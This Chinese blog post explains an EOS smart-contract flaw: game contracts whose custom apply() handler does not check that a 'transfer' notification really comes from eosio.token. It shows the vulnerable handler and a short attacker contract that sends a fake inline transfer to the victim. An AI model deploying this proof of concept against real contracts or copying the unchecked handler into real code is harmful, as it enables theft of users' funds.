eos源码解析(番外1):eosio.token验证漏洞

佛日,人生有八苦,其三:求不得、怨憎会、爱离别。
说老实话,当周五bet被攻击的时候,当aabbccddeefg褥走5万柚子的时候,还是无耻邪恶了一把,当时的内心独白:“艹,我怎么没想到.....,5*30 = 120 ≈ 一套房.....”。不过,本人资质驽钝,总是后知后觉,如此,也就蛋定许多(∩_∩)。
合约要从c++变成可部署的,需要两个文件, *.wast or *.wasm,*.abi,其中*.abi是接口描述,比如:

{
  "____comment": "This file was generated by eosio-abigen. DO NOT EDIT - 2018-09-15T00:05:19",
  "version": "eosio::abi/1.0",
  "types": [],
  "structs": [{
      "name": "hi",
      "base": "",
      "fields": [{
          "name": "from",
          "type": "name"
        },{
          "name": "to",
          "type": "name"
        },{
          "name": "quantity",
          "type": "asset"
        },{
          "name": "memo",
          "type": "string"
        }
      ]
    }
  ],
  "actions": [{
      "name": "hi",
      "type": "hi",
      "ricardian_contract": ""
    }
  ],
  "tables": [],
  "ricardian_clauses": [],
  "error_messages": [],
  "abi_extensions": []
}

描述了一个合约中的“hi”函数有哪些输入,以及输入的类型。这样,在我们用“cleos push action”调用合约的时候,可以根据合约的abi解析相应的参数。
比如:

cleos  push action abc hi '["abc", "xiaomiantuan" , "0.0200 SYS","" ]' -p abc

则解析from为“abc”。
正常的话,如果没有abi,则我们无法解析传入的参数,也就无法调用合约。
我们玩一个eos的游戏,正常的套路是给这个游戏合约打钱。比如xiaomiantuan合约,我们给xiaomiantuan合约打钱,xiaomiantuan怎么知道我们给它打了钱呢?其实我们给xiaomiantuan打钱,是调用了eosio.token合约的transfer。

void token::transfer( account_name from,
                      account_name to,
                      asset        quantity,
                      string       memo )
{
    eosio_assert( from != to, "cannot transfer to self" );
    require_auth( from );
    eosio_assert( is_account( to ), "to account does not exist");
    auto sym = quantity.symbol.name();
    stats statstable( _self, sym );
    const auto& st = statstable.get( sym );

    require_recipient( from );
    require_recipient( to );

    eosio_assert( quantity.is_valid(), "invalid quantity" );
    eosio_assert( quantity.amount > 0, "must transfer positive quantity" );
    eosio_assert( quantity.symbol == st.supply.symbol, "symbol precision mismatch" );
    eosio_assert( memo.size() <= 256, "memo has more than 256 bytes" );


    sub_balance( from, quantity );
    add_balance( to, quantity, from );
}

这里,require_recipient的含义就是通知xiaomiantuan。所谓“通知”,其实是尝试调用xiaomiantuan的某个“transfer”函数。
它最终会调用xiaomiantuan中定义的:
apply( uint64_t receiver, uint64_t code, uint64_t action )
其中 receiver : xiaomiantuan ; code:eosio.token ; action: transfer

在我们写合约的时候,最后一般会有EOSIO_ABI(xxxx)

#define EOSIO_ABI( TYPE, MEMBERS ) \
extern "C" { \
   void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \
      auto self = receiver; \
      if( action == N(onerror)) { \
         /* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \
         eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \
      } \
      if( code == self || action == N(onerror) ) { \
         TYPE thiscontract( self ); \
         switch( action ) { \
            EOSIO_API( TYPE, MEMBERS ) \
         } \
         /* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
      } \
   } \
} \

这里会做一个判断:code == self 因此如果我们不自己写apply函数,调用apply( xiaomiantuan, eosio.token, transfer )什么都不会发生,但一般来说,游戏合约会重写这个函数,使得调用发生点什么。而有的合约,并没有判断第二个参数是否是“eosio.token”,因此,傻乎乎的发生了不该发生的事,这就是今天所说的“漏洞”。
比如:

extern "C" { \
   void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \
      auto self = receiver; \
      if( action == N(onerror)) { \
         /* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \
         eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \
      } \
     if(action == N(transfer)){\
         print("aabbccddef");\
         return;\
    }\
      if( code == self || action == N(onerror) ) { \
         TYPE thiscontract( self ); \
         switch( action ) { \
            EOSIO_API( TYPE, MEMBERS ) \
         } \
         /* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
      } \
   } \
} \

重新写了apply函数之后,并不会生成“transfer”的abi,但调用还是那个调用,不过用“cleos push action xxx”是不可能了,这一辈子都不可能了。但是,至少,好像使用require_recipient可以,哈哈。
这是因为在合约内部调用不需要像“cleos push action xxx”一样解析参数类型,此时参数已经是现成的了。所以,聪明如你,试试下面这个:

#include 
#include 
#include 
#include 

using namespace eosio;

class hello : public eosio::contract {
  public:
      using contract::contract;

      /// @abi action 
      void hi( account_name from,
                      account_name to,
                      asset        quantity,
                      std::string       memo )
            {
                action(permission_level{_self, N(active)}, N(xiaomiantuan),
                N(transfer), std::make_tuple(_self, N(xiaomiantuan), quantity,
                                            std::string("")))
                .send();
            }
};

EOSIO_ABI( hello, (hi) )

上面的程序直接发起一个内联调用,参数已经直接提供,因此也不需要通过“abi”来解析参数,因此如果xiaomiantuan合约的transfer有漏洞的话,这个内联是会成功调用的。
。。。。
终于写完了,最后,,,合约真真细致的干活

你可能感兴趣的:(eos源码解析(番外1):eosio.token验证漏洞)